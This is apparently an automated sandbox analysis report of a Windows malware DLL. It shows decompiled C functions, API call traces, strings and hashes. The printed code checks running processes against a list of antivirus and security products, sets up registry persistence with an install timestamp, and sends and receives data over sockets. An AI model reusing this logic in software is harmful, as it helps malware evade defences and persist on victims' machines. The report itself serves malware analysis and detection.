lstrcatA.KERNEL32(100275B4,10024FB0,?,?,?,?,000003F0,?,00000000), ref: 1000AA2D
lstrcatA.KERNEL32(100275B4,10024FB8,?,?,?,?,000003F0,?,00000000), ref: 1000AA39
memset.MSVCRT ref: 1000AA59
lstrcatA.KERNEL32(100275B4,10024FBC,?,?,?,?,000003F0,?,00000000), ref: 1000AA67
lstrcatA.KERNEL32(100275B4,10024FC4,?,?,?,?,000003F0,?,00000000), ref: 1000AA73
memset.MSVCRT ref: 1000AA93
lstrcatA.KERNEL32(100275B4,10024FC8,?,?,?,?,000003F0,?,00000000), ref: 1000AAA1
lstrcatA.KERNEL32(100275B4,10024FD4,?,?,?,?,000003F0,?,00000000), ref: 1000AAAD
memset.MSVCRT ref: 1000AACD
lstrcatA.KERNEL32(100275B4,Quick Heal,?,?,?,?,000003F0,?,00000000), ref: 1000AADB
lstrcatA.KERNEL32(100275B4,10024FE4,?,?,?,?,000003F0,?,00000000), ref: 1000AAE7
memset.MSVCRT ref: 1000AB07
lstrcatA.KERNEL32(100275B4,10024FE8,?,?,?,?,000003F0,?,00000000), ref: 1000AB15
lstrcatA.KERNEL32(100275B4,10024FF0,?,?,?,?,000003F0,?,00000000), ref: 1000AB21
strstr.MSVCRT ref: 1000AB2D
lstrcatA.KERNEL32(100275B4,10024FF8,?,00000000), ref: 1000AB3F

Strings

9158.EXE, xrefs: 1000A7D9, 1000A7DC
mstsc.EXE, xrefs: 1000A847, 1000A84D
9158, xrefs: 1000A7F5
DUBrute.exe, xrefs: 1000A8BB, 1000A8C1
ashDisp.exe, xrefs: 1000A1A9, 1000A1AF
AVG, xrefs: 1000A3B7
V3Svc.exe, xrefs: 1000A56D, 1000A573
yy.exe, xrefs: 1000A7A5, 1000A7A8
s.exe, xrefs: 1000A969, 1000A96C
ccSvcHst.exe, xrefs: 1000A321, 1000A327
FortiTray.exe, xrefs: 1000A66F, 1000A675
spidernt.exe, xrefs: 1000A1E3, 1000A1E9
safedog.exe, xrefs: 1000AAED, 1000AAF3
qq.EXE, xrefs: 1000A771, 1000A774
1433.exe, xrefs: 1000A9D7, 1000A9DA
McAfee, xrefs: 1000A23F
AliIM.exe, xrefs: 1000A881, 1000A887
Mcshield.exe, xrefs: 1000A21D, 1000A223
MPMON.EXE, xrefs: 1000A0FB, 1000A101
FTP.exe, xrefs: 1000AA0B, 1000AA0E
KvMonXP.exe, xrefs: 10009FA5, 10009FAB
DUB, xrefs: 1000A8DD
Authentium, xrefs: 1000A37D
almon.exe, xrefs: 1000A5E1, 1000A5E7
e, xrefs: 1000A28D
RavMonD.exe, xrefs: 10009FDF, 10009FE5
360tray.exe, xrefs: 10009F35, 10009F3B
TMBMSRV.exe, xrefs: 1000A135, 1000A13B
arcavir.exe, xrefs: 1000A2E7, 1000A2ED
mssecess.exe, xrefs: 1000A533, 1000A539
F-PROT.exe, xrefs: 1000A48B, 1000A491
guardxservice.exe, xrefs: 1000A4DF, 1000A4E5
f-secure.exe, xrefs: 1000A257, 1000A25D
authfw.exe, xrefs: 1000A35B, 1000A361
Sunbelt, xrefs: 1000A657
Comodo, xrefs: 1000A474, 1000A477
vsserv.exe, xrefs: 1000A3CF, 1000A3D5
avcenter.exe, xrefs: 1000A16F, 1000A175
ccSetMgr.exe, xrefs: 1000AA79, 1000AA7F
BaiduSdSvc.exe, xrefs: 1000A737, 1000A73D
Quick Heal, xrefs: 1000AAD5
QQPCRTP.exe, xrefs: 1000A6FD, 1000A703
QUHLPSVC.EXE, xrefs: 1000AAB3, 1000AAB9
agent.exe, xrefs: 1000A409, 1000A40C
egui.exe, xrefs: 1000A08D, 1000A090
Avira, xrefs: 1000A191
kxetray.exe, xrefs: 1000A0C1, 1000A0C7
remupd.exe, xrefs: 1000A5A7, 1000A5AD
Arcavir, xrefs: 1000A309
Miner.exe, xrefs: 1000A053, 1000A059
NOD32, xrefs: 1000A0A9
r, xrefs: 1000A289
NVCSched.exe, xrefs: 1000A6A9, 1000A6AF
CVC, xrefs: 1000A82F
ksafe.exe, xrefs: 1000A2B3, 1000A2B6
APASServ.exe, xrefs: 1000A635, 1000A63B
BitDefender, xrefs: 1000A3F1
Nsvmon.npc, xrefs: 1000A8F5, 1000A8FB
Naver, xrefs: 1000A917
cfp.exe, xrefs: 1000A43D, 1000A440
MSE, xrefs: 1000A555
Dr.WEB, xrefs: 1000A205
Avast, xrefs: 1000A1CB
patray.exe, xrefs: 1000AA3F, 1000AA45
avp.exe, xrefs: 10009F71, 10009F74
knsdtray.exe, xrefs: 1000A92F, 1000A935
ServUDaemon.exe, xrefs: 1000A99D, 1000A9A3
360sd.exe, xrefs: 1000A019, 1000A01F
avgui.exe, xrefs: 1000A395, 1000A39B
Camfrog Video Chat.exe, xrefs: 1000A80D, 1000A813

Memory Dump Source

Source File: 00000003.00000002.465903001.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465895100.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.465954492.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.465983464.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcat$memset$Process32$#823#825AddressCreateFirstLibraryLoadNextProcSnapshotToolhelp32_strcmpilstrcmpistrstr
String ID: 1433.exe$360sd.exe$360tray.exe$9158$9158.EXE$APASServ.exe$AVG$AliIM.exe$Arcavir$Authentium$Avast$Avira$BaiduSdSvc.exe$BitDefender$CVC$Camfrog Video Chat.exe$Comodo$DUB$DUBrute.exe$Dr.WEB$F-PROT.exe$FTP.exe$FortiTray.exe$KvMonXP.exe$MPMON.EXE$MSE$McAfee$Mcshield.exe$Miner.exe$NOD32$NVCSched.exe$Naver$Nsvmon.npc$QQPCRTP.exe$QUHLPSVC.EXE$Quick Heal$RavMonD.exe$ServUDaemon.exe$Sunbelt$TMBMSRV.exe$V3Svc.exe$agent.exe$almon.exe$arcavir.exe$ashDisp.exe$authfw.exe$avcenter.exe$avgui.exe$avp.exe$ccSetMgr.exe$ccSvcHst.exe$cfp.exe$e$egui.exe$f-secure.exe$guardxservice.exe$knsdtray.exe$ksafe.exe$kxetray.exe$mssecess.exe$mstsc.EXE$patray.exe$qq.EXE$r$remupd.exe$s.exe$safedog.exe$spidernt.exe$vsserv.exe$yy.exe
API String ID: 3279466320-2620454017
Opcode ID: c3950ba9f911c3cb71822ed61acf676649b05ed3865c95b24a1aee82c0a4b61b
Instruction ID: 4f2885c5500bab1b9a796deea68c4df04d36bc87c30d4fd0a1583e27c0ba76d2
Opcode Fuzzy Hash: c3950ba9f911c3cb71822ed61acf676649b05ed3865c95b24a1aee82c0a4b61b
Instruction Fuzzy Hash: E9F20121C0C6E8DDEB22C3649C4DBCE7FB95F22349F0841D9E14C66152C7BA5B988B76

Uniqueness

Uniqueness Score: -1.00%

Function 1000D502, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 144
libraryloaderregistryCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E1000D502(void* _a4, char* _a8, char* _a12, intOrPtr _a16, CHAR* _a20, char _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v20;
				_Unknown_base(*)()* _v32;
				int _v36;
				int _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				_Unknown_base(*)()* _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				void* _v64;
				_Unknown_base(*)()* _v68;
				void* __ebp;
				intOrPtr _t55;
				long _t66;
				void* _t68;
				void* _t69;
				struct HINSTANCE__* _t80;
				intOrPtr _t85;
				intOrPtr _t86;

				_push(0xffffffff);
				_push(0x1001b498);
				_push(0x10015a2a);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t86;
				_v36 = 0;
				_t80 = LoadLibraryA("ADVAPI32.dll");
				_v60 = _t80;
				_v48 = GetProcAddress(_t80, "RegCreateKeyExA");
				_v56 = GetProcAddress(_t80, "RegSetValueExA");
				_v32 = GetProcAddress(_t80, "RegDeleteKeyA");
				_v68 = GetProcAddress(_t80, "RegDeleteValueA");
				_v44 = GetProcAddress(_t80, "RegOpenKeyExA");
				_v52 = GetProcAddress(_t80, "RegCloseKey");
				_v8 = 0;
				_t55 = _a28;
				if(_t55 == 0) {
					if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0xf003f, 0,  &_v64,  &_v40) != 0) {
						L20:
						_v8 = _v8 | 0xffffffff;
						E1000D68E();
						if(_t80 != 0) {
							FreeLibrary(_t80);
						}
						 *[fs:0x0] = _v20;
						return _v36;
					}
					L9:
					if(RegOpenKeyExA(_a4, _a8, 0, 0x2001f,  &_v64) != 0) {
						goto L20;
					}
					_t85 = _a16;
					if(_t85 <= 0) {
						goto L20;
					}
					if(_t85 <= 2) {
						L16:
						_push(lstrlenA(_a20) + 1);
						_push(_a20);
						_push(_t85);
						L17:
						_t66 = RegSetValueExA(_v64, _a12, 0, ??, ??, ??);
						L18:
						if(_t66 == 0) {
							_v36 = 1;
						}
						goto L20;
					}
					if(_t85 == 4) {
						_push(4);
						_push( &_a24);
						_push(4);
						goto L17;
					}
					if(_t85 == 7) {
						goto L16;
					}
					goto L20;
				}
				_t68 = _t55 - 1;
				if(_t68 == 0) {
					goto L9;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					_push( &_v64);
					_push(0x2001f);
					_push(0);
					_push(_a8);
					_push(_a4);
					if(_v44() != 0) {
						goto L20;
					}
					_t66 = _v32(_v64, _a12);
					goto L18;
				}
				if(_t69 != 1) {
					goto L20;
				}
				_push( &_v64);
				_push(0x2001f);
				_push(0);
				_push(_a8);
				_push(_a4);
				if(_v44() != 0) {
					goto L20;
				}
				_t66 = _v68(_v64, _a12);
				goto L18;
			}

0x1000d505
0x1000d507
0x1000d50c
0x1000d517
0x1000d518
0x1000d527
0x1000d535
0x1000d537
0x1000d548
0x1000d553
0x1000d55e
0x1000d569
0x1000d574
0x1000d57f
0x1000d582
0x1000d588
0x1000d58a
0x1000d604
0x1000d663
0x1000d663
0x1000d667
0x1000d66e
0x1000d671
0x1000d671
0x1000d67d
0x1000d688
0x1000d688
0x1000d606
0x1000d61b
0x00000000
0x00000000
0x1000d61d
0x1000d622
0x00000000
0x00000000
0x1000d627
0x1000d63f
0x1000d649
0x1000d64a
0x1000d64d
0x1000d64e
0x1000d655
0x1000d658
0x1000d65a
0x1000d65c
0x1000d65c
0x00000000
0x1000d65a
0x1000d62c
0x1000d635
0x1000d63a
0x1000d63b
0x00000000
0x1000d63b
0x1000d631
0x00000000
0x00000000
0x00000000
0x1000d633
0x1000d58c
0x1000d58d
0x00000000
0x00000000
0x1000d58f
0x1000d590
0x1000d5c5
0x1000d5c6
0x1000d5cb
0x1000d5cc
0x1000d5cf
0x1000d5d7
0x00000000
0x00000000
0x1000d5e3
0x00000000
0x1000d5e3
0x1000d593
0x00000000
0x00000000
0x1000d59c
0x1000d59d
0x1000d5a2
0x1000d5a3
0x1000d5a6
0x1000d5ae
0x00000000
0x00000000
0x1000d5ba
0x00000000

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,00000001,000F01FF,00000000,?,10015A2A,1001B498,000000FF,?,10003278,80000002,?,Description,00000001,?,00000000), ref: 1000D52F
GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000D546
GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000D551
GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000D55C
GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000D567
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000D572
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000D57D
RegCreateKeyExA.KERNELBASE(?,00000001,00000000,00000000,00000000,000F003F,00000000,?,?,?,10003278,80000002,?,Description,00000001,?), ref: 1000D5FF
RegOpenKeyExA.KERNELBASE(?,00000001,00000000,0002001F,?,?,10003278,80000002,?,Description,00000001,?,00000000), ref: 1000D616
RegSetValueExA.KERNELBASE(?,?,00000000,?,80000002,00000001,?,10003278,80000002,?,Description,00000001,?,00000000), ref: 1000D655
FreeLibrary.KERNEL32(00000000,?,10003278,80000002,?,Description,00000001,?), ref: 1000D671

Strings

RegDeleteKeyA, xrefs: 1000D556
ADVAPI32.dll, xrefs: 1000D52A
RegDeleteValueA, xrefs: 1000D561
RegCloseKey, xrefs: 1000D577
RegCreateKeyExA, xrefs: 1000D53A
RegOpenKeyExA, xrefs: 1000D56C
RegSetValueExA, xrefs: 1000D54B

Memory Dump Source

Source File: 00000003.00000002.465903001.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465895100.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.465954492.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.465983464.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$CreateFreeLoadOpenValue
String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
API String ID: 554063521-3188892968
Opcode ID: 5a6eb46eb862b6c3f8adcebf82aef03c8f141187e3a8e0bf1e53564c59b37267
Instruction ID: 7bd5380c1d7209d2e7036881a142ae5b6984c826e5d31ced9866207cfd76fef9
Opcode Fuzzy Hash: 5a6eb46eb862b6c3f8adcebf82aef03c8f141187e3a8e0bf1e53564c59b37267
Instruction Fuzzy Hash: 83410571D0021DBFEB01EF94DC84EEEBBB9EB08690F404126FA19A2164DB329D519B64

Uniqueness

Uniqueness Score: -1.00%

Function 10002C28, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 93
registrystringtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E10002C28() {
				void* _v8;
				int _v12;
				int _v16;
				struct _SYSTEMTIME _v32;
				char _v64;
				char _v324;
				char* _t24;
				long _t26;
				void* _t42;
				int _t43;
				int _t48;

				wsprintfA( &_v324, "SYSTEM\\CurrentControlSet\\Services\\%s", "Vwxyab Defghijk");
				_t24 = RegOpenKeyExA(0x80000001,  &_v324, 0, 0x20019,  &_v8); // executed
				_t48 = 0x50;
				_push(_t48);
				L10015806();
				_v16 = _t48;
				_t43 = 1;
				_v12 = _t43;
				_t26 = RegQueryValueExA(_v8, "Group", 0,  &_v12, _t24,  &_v16);
				if(_t26 != 0) {
					E1000D502(0x80000001,  &_v324, "Group", _t43, 0x10027154, strlen(0x10027154), 0); // executed
					GetLocalTime( &_v32);
					wsprintfA( &_v64, "%4d-%.2d-%.2d %.2d:%.2d", _v32.wYear & 0x0000ffff, _v32.wMonth & 0x0000ffff, _v32.wDay & 0x0000ffff, _v32.wHour & 0x0000ffff, _v32.wMinute & 0x0000ffff);
					_t42 = E1000D502(0x80000001,  &_v324, "InstallTime", _t43,  &_v64, strlen( &_v64), _t43); // executed
					return _t42;
				}
				return _t26;
			}

0x10002c45
0x10002c66
0x10002c6e
0x10002c6f
0x10002c70
0x10002c76
0x10002c7e
0x10002c84
0x10002c92
0x10002c9a
0x10002cbf
0x10002ccb
0x10002cf3
0x10002d1b
0x00000000
0x10002d20
0x10002d27

APIs

wsprintfA.USER32 ref: 10002C45
RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,10002D99), ref: 10002C66
#823.MFC42(00000050), ref: 10002C70
RegQueryValueExA.ADVAPI32(10002D99,Group,00000000,?,00000000,?), ref: 10002C92
strlen.MSVCRT ref: 10002CA8

Part of subcall function 1000D502: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000001,000F01FF,00000000,?,10015A2A,1001B498,000000FF,?,10003278,80000002,?,Description,00000001,?,00000000), ref: 1000D52F
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000D546
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000D551
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000D55C
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000D567
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000D572
Part of subcall function 1000D502: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000D57D
Part of subcall function 1000D502: FreeLibrary.KERNEL32(00000000,?,10003278,80000002,?,Description,00000001,?), ref: 1000D671

GetLocalTime.KERNEL32(?), ref: 10002CCB
wsprintfA.USER32 ref: 10002CF3
strlen.MSVCRT ref: 10002D01

Strings

SYSTEM\CurrentControlSet\Services\%s, xrefs: 10002C3F
InstallTime, xrefs: 10002D14
Vwxyab Defghijk, xrefs: 10002C34
Group, xrefs: 10002C8A
Fatal, xrefs: 10002CA0, 10002CA7, 10002CB0
Group, xrefs: 10002CB8
%4d-%.2d-%.2d %.2d:%.2d, xrefs: 10002CED

Memory Dump Source

Source File: 00000003.00000002.465903001.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465895100.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.465954492.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.465983464.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$Librarystrlenwsprintf$#823FreeLoadLocalOpenQueryTimeValue
String ID: %4d-%.2d-%.2d %.2d:%.2d$Fatal$Group$Group$InstallTime$SYSTEM\CurrentControlSet\Services\%s$Vwxyab Defghijk
API String ID: 548350534-2616979974
Opcode ID: 07453de225c6af56c686c76c2224521dc47c2e3d0f9440401d161053d0eab88a
Instruction ID: 44714e98a0821778f504ed209df3c83011958f193c28db2cca10f28a8106401a
Opcode Fuzzy Hash: 07453de225c6af56c686c76c2224521dc47c2e3d0f9440401d161053d0eab88a
Instruction Fuzzy Hash: FA212BB2900118BAEB11DB95EC89FFFB77CEB08711F504056FA05E1090EB78AB459B75

Uniqueness

Uniqueness Score: -1.00%

Function 1000CC7C, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 53
libraryprocessstringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E1000CC7C(CHAR* _a4) {
				struct tagPROCESSENTRY32W _t7;
				int _t8;
				int _t10;
				void* _t12;
				CHAR* _t18;
				struct tagPROCESSENTRY32W _t19;

				GetProcAddress(LoadLibraryA("KERNEL32.dll"), "CreateToolhelp32Snapshot");
				_t7 = CreateToolhelp32Snapshot(2, 0); // executed
				_t12 = _t7;
				_push(0x128);
				L10015806();
				_t19 = _t7;
				 *_t19 = 0x128; // executed
				_t8 = Process32First(_t12, _t19); // executed
				if(_t8 == 0) {
					L6:
					_push(_t19);
					L10015800();
					return 0;
				}
				_t2 = _t19 + 0x24; // 0x24
				_t18 = _t2;
				__imp___strcmpi(_t18, _a4);
				while(_t8 != 0) {
					_t10 = Process32Next(_t12, _t19); // executed
					if(_t10 == 0) {
						goto L6;
					}
					_t8 = lstrcmpiA(_t18, _a4);
				}
				return  *((intOrPtr*)(_t19 + 8));
			}

0x1000cc93
0x1000cc9d
0x1000cca4
0x1000cca6
0x1000cca7
0x1000ccad
0x1000ccb1
0x1000ccb3
0x1000ccba
0x1000cceb
0x1000cceb
0x1000ccec
0x00000000
0x1000ccf2
0x1000ccbf
0x1000ccbf
0x1000ccc3
0x1000cce2
0x1000cccf
0x1000ccd6
0x00000000
0x00000000
0x1000ccdc
0x1000ccdc
0x00000000

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll,CreateToolhelp32Snapshot,00000001,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,?,100028F7,?), ref: 1000CC8C
GetProcAddress.KERNEL32(00000000), ref: 1000CC93
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,100028F7,?), ref: 1000CC9D
#823.MFC42(00000128,?,100028F7,?), ref: 1000CCA7
Process32First.KERNEL32(00000000,00000000), ref: 1000CCB3
_strcmpi.MSVCRT ref: 1000CCC3
Process32Next.KERNEL32 ref: 1000CCCF
lstrcmpiA.KERNEL32(00000024,00000000,00000000,00000000,?), ref: 1000CCDC
#825.MFC42(00000000,00000000,00000000,?,100028F7,?), ref: 1000CCEC

Strings

KERNEL32.dll, xrefs: 1000CC87
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 1000CC7F
CreateToolhelp32Snapshot, xrefs: 1000CC82

Memory Dump Source

Source File: 00000003.00000002.465903001.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465895100.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.465954492.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.465983464.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process32$#823#825AddressCreateFirstLibraryLoadNextProcSnapshotToolhelp32_strcmpilstrcmpi
String ID: CreateToolhelp32Snapshot$KERNEL32.dll$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 2744286280-2081920179
Opcode ID: 4ff52d65558ffe827c038084b4c773ca9db3a0cf43650b8f1a1a279ed4767270
Instruction ID: 69ff8049d7196bb17128d5a75f148d677afba39a3fc62441a7aaebc993ea7ff3
Opcode Fuzzy Hash: 4ff52d65558ffe827c038084b4c773ca9db3a0cf43650b8f1a1a279ed4767270
Instruction Fuzzy Hash: 54018632204315BBF7149B62ED89EAF3BACDF457A1B614429F90DE9081DF31E8418764

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCF9, Relevance: 6.0, APIs: 4, Instructions: 34
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000CCF9(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				void* _t16;
				char* _t17;

				_v20 = _a12;
				_v16 = _a16;
				_t16 = CreateEventA(0, 0, 0, 0);
				_v8 = _t16;
				_t17 =  &_v20;
				__imp___beginthreadex(_a4, _a8, E1000CBD9, _t17, _a20, _a24); // executed
				WaitForSingleObject(_v8, 0xffffffff);
				FindCloseChangeNotification(_v8); // executed
				return _t17;
			}

0x1000cd03
0x1000cd09
0x1000cd12
0x1000cd1b
0x1000cd1e
0x1000cd30
0x1000cd40
0x1000cd49
0x1000cd53

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000CD12
_beginthreadex.MSVCRT ref: 1000CD30
WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000CD40
FindCloseChangeNotification.KERNELBASE(?), ref: 1000CD49

Memory Dump Source

Source File: 00000003.00000002.465903001.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465895100.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.465954492.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.465983464.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ChangeCloseCreateEventFindNotificationObjectSingleWait_beginthreadex
String ID:
API String ID: 3885598390-0
Opcode ID: ad0f7ec64662bca58a2022b6a807c42a798f7e767a354621085c32fee53e81ec
Instruction ID: ce772f0cb4734fb78ef7562d1ccda63932f96424c42974d3cc2869668e6ebe41
Opcode Fuzzy Hash: ad0f7ec64662bca58a2022b6a807c42a798f7e767a354621085c32fee53e81ec
Instruction Fuzzy Hash: 34F0A975900119FFEF019FA8CD45CEE7BB9FB08254B104555FD15E2260E7318A259BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000183D, Relevance: 4.6, APIs: 3, Instructions: 72
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000183D(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr _v260;
				void _v264;
				void _v524;
				void _v102924;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				void* _t25;
				void* _t30;
				signed int _t40;
				void* _t57;
				void* _t65;

				_t65 = __fp0;
				E100158E0(0x19208, __ecx);
				_v264 = 1;
				_v260 =  *((intOrPtr*)(_a4 + 0x48));
				_t21 = E1000191E(_a4);
				if(_t21 != 0) {
					while(1) {
						_t40 = 0x41;
						memcpy( &_v524,  &_v264, _t40 << 2);
						_t57 = _t57 + 0xc;
						_t25 =  *0x100273b0(0,  &_v524, 0, 0, 0); // executed
						if(_t25 == 0xffffffff) {
							break;
						}
						if(_t25 <= 0) {
							L6:
							_t21 = E1000191E(_a4);
							if(_t21 != 0) {
								continue;
							} else {
							}
						} else {
							memset( &_v102924, 0, 0x19000);
							_t57 = _t57 + 0xc;
							_t30 =  *0x100273a0( *((intOrPtr*)(_a4 + 0x48)),  &_v102924, 0x19000, 0);
							_t52 = _t30;
							if(_t30 <= 0) {
								break;
							} else {
								E1000181C( &_v102924, _t52);
								E10001922(0x19000, _a4, _t52, 0, _t65,  &_v102924, _t52);
								goto L6;
							}
						}
						goto L9;
					}
					_t21 = E10001B2C(_a4);
				}
				L9:
				return _t21 | 0xffffffff;
			}

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10001893
memset.MSVCRT ref: 100018AB
recv.WS2_32(?,?,00019000,00000000), ref: 100018C3

Part of subcall function 10001922: __EH_prolog.LIBCMT ref: 10001927
Part of subcall function 10001922: memcmp.MSVCRT ref: 10001954

Memory Dump Source

Source File: 00000003.00000002.465903001.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465895100.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.465954492.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.465983464.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: H_prologmemcmpmemsetrecvselect
String ID:
API String ID: 845096623-0
Opcode ID: 5c3ff7316f6dfee5cb485ca0d241435410e4a6404ba55340f6339312f7b03e9b
Instruction ID: b5bd1622c9b73d0408b8acb0fcb17832c9177206b34e69b9ff4c9176cbfd8fe1
Opcode Fuzzy Hash: 5c3ff7316f6dfee5cb485ca0d241435410e4a6404ba55340f6339312f7b03e9b
Instruction Fuzzy Hash: 36218E76500128ABDB21CB64DC98DCF7BACEF493E0F100151F95997195DB71AEC5CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001CF7, Relevance: 4.6, APIs: 3, Instructions: 64
networksleepCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E10001CF7(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t36;
				intOrPtr _t39;
				signed int _t40;
				void* _t41;

				_push(_t32);
				_t30 = _a4;
				_t39 = _a8;
				_t36 = _t32;
				E10001CD6(_t30, _t39);
				_v8 = _v8 & 0x00000000;
				_a4 = _t39;
				_t40 = _a12;
				if(_a8 < _t40) {
					L6:
					_t41 = 0;
					if(_a4 <= 0) {
						L11:
						_t28 = _v8;
						if(_t28 != _a8) {
							goto L12;
						}
					} else {
						while(1) {
							_t28 =  *0x1002739c( *((intOrPtr*)(_t36 + 0x48)), _t30, _a4, 0); // executed
							if(_t28 > 0) {
								break;
							}
							_t41 = _t41 + 1;
							if(_t41 < 0xf) {
								continue;
							}
							break;
						}
						if(_t41 == 0xf) {
							goto L12;
						} else {
							_v8 = _v8 + _t28;
							goto L11;
						}
					}
				} else {
					do {
						_a12 = _a12 & 0x00000000;
						while(1) {
							_t28 =  *0x1002739c( *((intOrPtr*)(_t36 + 0x48)), _t30, _t40, 0);
							if(_t28 > 0) {
								break;
							}
							_a12 = _a12 + 1;
							if(_a12 < 0xf) {
								continue;
							}
							break;
						}
						if(_a12 == 0xf) {
							L12:
							_t28 = _t28 | 0xffffffff;
						} else {
							goto L5;
						}
						goto L13;
						L5:
						_v8 = _v8 + _t28;
						_t30 = _t30 + _t40;
						Sleep(0xa);
						_a4 = _a4 - _t40;
					} while (_a4 >= _t40);
					goto L6;
				}
				L13:
				return _t28;
			}

0x10001cfa
0x10001cfc
0x10001d00
0x10001d05
0x10001d08
0x10001d0d
0x10001d11
0x10001d14
0x10001d1c
0x10001d57
0x10001d57
0x10001d5c
0x10001d7f
0x10001d7f
0x10001d85
0x00000000
0x00000000
0x10001d5e
0x10001d5e
0x10001d67
0x10001d6f
0x00000000
0x00000000
0x10001d71
0x10001d75
0x00000000
0x00000000
0x00000000
0x10001d75
0x10001d7a
0x00000000
0x10001d7c
0x10001d7c
0x00000000
0x10001d7c
0x10001d7a
0x10001d1e
0x10001d1e
0x10001d1e
0x10001d22
0x10001d29
0x10001d31
0x00000000
0x00000000
0x10001d33
0x10001d3a
0x00000000
0x00000000
0x00000000
0x10001d3a
0x10001d40
0x10001d87
0x10001d87
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d42
0x10001d42
0x10001d47
0x10001d49
0x10001d4f
0x10001d52
0x00000000
0x10001d1e
0x10001d8a
0x10001d8e

APIs

send.WS2_32(?,?,00000003,00000000), ref: 10001D29
Sleep.KERNEL32(0000000A,?,10001CCF,00000000,00000000,00000000,00019000,?,00000003,?), ref: 10001D49
send.WS2_32(?,?,?,00000000), ref: 10001D67

Memory Dump Source

Source File: 00000003.00000002.465903001.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465895100.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.465954492.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.465983464.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: send$Sleep
String ID:
API String ID: 3329562092-0
